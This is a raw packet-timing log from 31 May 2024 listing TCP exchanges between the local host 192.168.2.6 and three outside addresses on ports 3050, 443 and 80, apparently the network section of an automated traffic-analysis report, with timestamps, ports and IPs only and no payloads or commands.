                              May 31, 2024 08:09:40.567002058 CEST515493050192.168.2.6178.215.236.110
                              May 31, 2024 08:09:40.567011118 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:40.567017078 CEST515493050192.168.2.6178.215.236.110
                              May 31, 2024 08:09:40.567027092 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:40.567042112 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:40.567049026 CEST515493050192.168.2.6178.215.236.110
                              May 31, 2024 08:09:40.567061901 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:40.567065954 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:40.567080975 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:40.567087889 CEST515493050192.168.2.6178.215.236.110
                              May 31, 2024 08:09:40.567097902 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:40.567111969 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:40.567114115 CEST515493050192.168.2.6178.215.236.110
                              May 31, 2024 08:09:40.567127943 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:40.567147970 CEST515493050192.168.2.6178.215.236.110
                              May 31, 2024 08:09:40.567173004 CEST515493050192.168.2.6178.215.236.110
                              May 31, 2024 08:09:40.567378998 CEST515493050192.168.2.6178.215.236.110
                              May 31, 2024 08:09:40.567847013 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:40.567991972 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:40.568006992 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:40.568022013 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:40.568037033 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:40.568043947 CEST515493050192.168.2.6178.215.236.110
                              May 31, 2024 08:09:40.568053007 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:40.568062067 CEST515493050192.168.2.6178.215.236.110
                              May 31, 2024 08:09:40.568068981 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:40.568084955 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:40.568087101 CEST515493050192.168.2.6178.215.236.110
                              May 31, 2024 08:09:40.568100929 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:40.568118095 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:40.568125010 CEST515493050192.168.2.6178.215.236.110
                              May 31, 2024 08:09:40.568155050 CEST515493050192.168.2.6178.215.236.110
                              May 31, 2024 08:09:40.569000006 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:40.569061995 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:40.569077015 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:40.569092989 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:40.569109917 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:40.569114923 CEST515493050192.168.2.6178.215.236.110
                              May 31, 2024 08:09:40.569185972 CEST515493050192.168.2.6178.215.236.110
                              May 31, 2024 08:09:40.572244883 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:40.572295904 CEST515493050192.168.2.6178.215.236.110
                              May 31, 2024 08:09:40.572438002 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:40.572463036 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:40.572478056 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:40.572499990 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:40.572510958 CEST515493050192.168.2.6178.215.236.110
                              May 31, 2024 08:09:40.572546959 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:40.572561979 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:40.572576046 CEST515493050192.168.2.6178.215.236.110
                              May 31, 2024 08:09:40.572592974 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:40.572608948 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:40.572621107 CEST515493050192.168.2.6178.215.236.110
                              May 31, 2024 08:09:40.572623968 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:40.572640896 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:40.572648048 CEST515493050192.168.2.6178.215.236.110
                              May 31, 2024 08:09:40.572657108 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:40.572671890 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:40.572690010 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:40.572691917 CEST515493050192.168.2.6178.215.236.110
                              May 31, 2024 08:09:40.572693110 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:40.572704077 CEST515493050192.168.2.6178.215.236.110
                              May 31, 2024 08:09:40.572717905 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:40.572738886 CEST515493050192.168.2.6178.215.236.110
                              May 31, 2024 08:09:40.572742939 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:40.572758913 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:40.572773933 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:40.572784901 CEST515493050192.168.2.6178.215.236.110
                              May 31, 2024 08:09:40.572788954 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:40.572805882 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:40.572810888 CEST515493050192.168.2.6178.215.236.110
                              May 31, 2024 08:09:40.572823048 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:40.572838068 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:40.572854042 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:40.572854996 CEST515493050192.168.2.6178.215.236.110
                              May 31, 2024 08:09:40.572870016 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:40.572884083 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:40.572885990 CEST515493050192.168.2.6178.215.236.110
                              May 31, 2024 08:09:40.572900057 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:40.572906971 CEST515493050192.168.2.6178.215.236.110
                              May 31, 2024 08:09:40.572916031 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:40.572931051 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:40.572940111 CEST515493050192.168.2.6178.215.236.110
                              May 31, 2024 08:09:40.572946072 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:40.572962046 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:40.572976112 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:40.572983980 CEST515493050192.168.2.6178.215.236.110
                              May 31, 2024 08:09:40.572993040 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:40.573007107 CEST515493050192.168.2.6178.215.236.110
                              May 31, 2024 08:09:40.573008060 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:40.573023081 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:40.573033094 CEST515493050192.168.2.6178.215.236.110
                              May 31, 2024 08:09:40.573039055 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:40.573054075 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:40.573069096 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:40.573071003 CEST515493050192.168.2.6178.215.236.110
                              May 31, 2024 08:09:40.573086023 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:40.573096991 CEST515493050192.168.2.6178.215.236.110
                              May 31, 2024 08:09:40.573101044 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:40.573116064 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:40.573124886 CEST515493050192.168.2.6178.215.236.110
                              May 31, 2024 08:09:40.573137999 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:40.573142052 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:40.573156118 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:40.573165894 CEST515493050192.168.2.6178.215.236.110
                              May 31, 2024 08:09:40.573172092 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:40.573187113 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:40.573196888 CEST515493050192.168.2.6178.215.236.110
                              May 31, 2024 08:09:40.573221922 CEST515493050192.168.2.6178.215.236.110
                              May 31, 2024 08:09:40.577910900 CEST515493050192.168.2.6178.215.236.110
                              May 31, 2024 08:09:40.920022011 CEST515483050192.168.2.6178.215.236.110
                              May 31, 2024 08:09:40.925209999 CEST305051548178.215.236.110192.168.2.6
                              May 31, 2024 08:09:41.377397060 CEST305051548178.215.236.110192.168.2.6
                              May 31, 2024 08:09:41.377495050 CEST515483050192.168.2.6178.215.236.110
                              May 31, 2024 08:09:41.378087997 CEST515483050192.168.2.6178.215.236.110
                              May 31, 2024 08:09:41.379287004 CEST8051544194.59.30.6192.168.2.6
                              May 31, 2024 08:09:41.379334927 CEST5154480192.168.2.6194.59.30.6
                              May 31, 2024 08:09:41.383325100 CEST305051548178.215.236.110192.168.2.6
                              May 31, 2024 08:09:43.582568884 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:43.582611084 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:43.582957983 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:43.589704037 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:43.589720964 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:44.294094086 CEST515493050192.168.2.6178.215.236.110
                              May 31, 2024 08:09:44.299190998 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:44.299253941 CEST515493050192.168.2.6178.215.236.110
                              May 31, 2024 08:09:44.299253941 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:44.299287081 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:44.299315929 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:44.299352884 CEST515493050192.168.2.6178.215.236.110
                              May 31, 2024 08:09:44.299362898 CEST515493050192.168.2.6178.215.236.110
                              May 31, 2024 08:09:44.299386978 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:44.299436092 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:44.299515009 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:44.299542904 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:44.299591064 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:44.299622059 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:44.304302931 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:44.304332018 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:44.304434061 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:44.304527044 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:44.304640055 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:44.304667950 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:44.304699898 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:44.352322102 CEST515493050192.168.2.6178.215.236.110
                              May 31, 2024 08:09:44.358094931 CEST305051549178.215.236.110192.168.2.6
                              May 31, 2024 08:09:44.358156919 CEST515493050192.168.2.6178.215.236.110
                              May 31, 2024 08:09:44.508990049 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:44.509095907 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:44.510902882 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:44.510927916 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:44.511188984 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:44.518183947 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:44.564507961 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:44.732228041 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:44.846417904 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:44.846523046 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:44.846538067 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:44.846584082 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:44.846606970 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:44.846633911 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:44.846661091 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:44.961093903 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:44.961124897 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:44.961159945 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:44.961169958 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:44.961189032 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:44.961230993 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:44.961261034 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:44.961261034 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:44.962167025 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:44.962176085 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:44.962199926 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:44.962213039 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:44.962213993 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:44.962227106 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:44.962239027 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:44.962240934 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:44.962263107 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:44.962264061 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:44.962290049 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:45.075896978 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.075953007 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.075978041 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.076005936 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:45.076021910 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.076055050 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:45.076081991 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.076107979 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:45.077100039 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.077153921 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.077178001 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:45.077195883 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.077224970 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.077249050 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.077251911 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:45.077253103 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:45.077267885 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.077305079 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.077305079 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:45.077330112 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.077358961 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:45.077358961 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:45.121726036 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:45.150293112 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:45.190115929 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.190139055 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.190181017 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.190200090 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.190203905 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:45.190224886 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.190254927 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:45.190254927 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:45.190279961 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:45.191164017 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.191185951 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.191229105 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:45.191237926 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.191263914 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:45.191278934 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.191308022 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:45.191348076 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:45.303330898 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.303380013 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.303416967 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:45.303432941 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.303458929 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:45.303523064 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:45.304352045 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.304419994 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.304429054 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:45.304444075 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.304478884 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:45.304529905 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:45.305156946 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.305202961 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.305236101 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:45.305248976 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.305279016 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:45.305299044 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:45.305829048 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.305896997 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:45.305907965 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.305928946 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.305968046 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:45.305989027 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:45.417735100 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.417820930 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.417819977 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:45.417865038 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:45.417889118 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.417915106 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:45.418030024 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:45.418478966 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.418498993 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.418550968 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:45.418564081 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.418592930 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:45.418669939 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:45.419147968 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.419173002 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.419235945 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:45.419250965 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.419301987 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:45.419680119 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.419698954 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.419747114 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:45.419759035 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.419785976 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:45.420248985 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:45.532037020 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.532138109 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.532156944 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:45.532192945 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.532219887 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:45.532356024 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:45.532444954 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.532512903 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:45.532546997 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.532618046 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:45.532975912 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.533035040 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.533066988 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:45.533077955 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.533107042 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:45.533186913 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:45.535151005 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.535248041 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.535254002 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:45.535290003 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:45.535301924 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.535346985 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:45.535346985 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:45.646007061 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.646034002 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.646125078 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:45.646164894 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.646224976 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:45.646544933 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.646563053 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.646621943 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:45.646641016 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.646665096 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:45.646683931 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:45.647120953 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.647140026 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.647186995 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:45.647198915 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.647223949 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:45.647244930 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:45.647988081 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.648015022 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.648056030 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:45.648068905 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.648123026 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:45.648329973 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:45.760144949 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.760173082 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.760243893 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:45.760288000 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.760318041 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:45.760339975 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:45.760716915 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.760736942 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.760775089 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:45.760788918 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.760816097 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:45.761106014 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:45.761887074 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.761920929 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.761965990 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:45.761984110 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.762008905 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:45.762029886 CEST44351553188.215.50.15192.168.2.6
                              May 31, 2024 08:09:45.762083054 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:45.764272928 CEST51553443192.168.2.6188.215.50.15
                              May 31, 2024 08:09:57.918474913 CEST305051547178.215.236.110192.168.2.6
                              May 31, 2024 08:09:57.922144890 CEST515473050192.168.2.6178.215.236.110
                              May 31, 2024 08:09:57.927114964 CEST305051547178.215.236.110192.168.2.6
                              May 31, 2024 08:10:14.563290119 CEST51555443192.168.2.6188.215.50.15
                              May 31, 2024 08:10:14.563338041 CEST44351555188.215.50.15192.168.2.6
                              May 31, 2024 08:10:14.563421011 CEST51555443192.168.2.6188.215.50.15
                              May 31, 2024 08:10:14.571680069 CEST51555443192.168.2.6188.215.50.15
                              May 31, 2024 08:10:14.571702003 CEST44351555188.215.50.15192.168.2.6
                              May 31, 2024 08:10:16.070540905 CEST44351555188.215.50.15192.168.2.6
                              May 31, 2024 08:10:16.070643902 CEST51555443192.168.2.6188.215.50.15
                              May 31, 2024 08:10:16.156913042 CEST51555443192.168.2.6188.215.50.15
                              May 31, 2024 08:10:16.156944990 CEST44351555188.215.50.15192.168.2.6
                              May 31, 2024 08:10:16.157259941 CEST44351555188.215.50.15192.168.2.6
                              May 31, 2024 08:10:16.157330036 CEST51555443192.168.2.6188.215.50.15
                              May 31, 2024 08:10:16.159873962 CEST51555443192.168.2.6188.215.50.15
                              May 31, 2024 08:10:16.204493999 CEST44351555188.215.50.15192.168.2.6
                              May 31, 2024 08:10:16.439296961 CEST44351555188.215.50.15192.168.2.6
                              May 31, 2024 08:10:16.439383030 CEST51555443192.168.2.6188.215.50.15
                              May 31, 2024 08:10:16.553159952 CEST44351555188.215.50.15192.168.2.6
                              May 31, 2024 08:10:16.553169012 CEST44351555188.215.50.15192.168.2.6
                              May 31, 2024 08:10:16.553246975 CEST44351555188.215.50.15192.168.2.6
                              May 31, 2024 08:10:16.553277969 CEST51555443192.168.2.6188.215.50.15
                              May 31, 2024 08:10:16.553299904 CEST44351555188.215.50.15192.168.2.6
                              May 31, 2024 08:10:16.553322077 CEST51555443192.168.2.6188.215.50.15
                              May 31, 2024 08:10:16.553349018 CEST51555443192.168.2.6188.215.50.15
                              May 31, 2024 08:10:16.667345047 CEST44351555188.215.50.15192.168.2.6
                              May 31, 2024 08:10:16.667375088 CEST44351555188.215.50.15192.168.2.6
                              May 31, 2024 08:10:16.667490005 CEST51555443192.168.2.6188.215.50.15
                              May 31, 2024 08:10:16.667519093 CEST44351555188.215.50.15192.168.2.6
                              May 31, 2024 08:10:16.667696953 CEST51555443192.168.2.6188.215.50.15
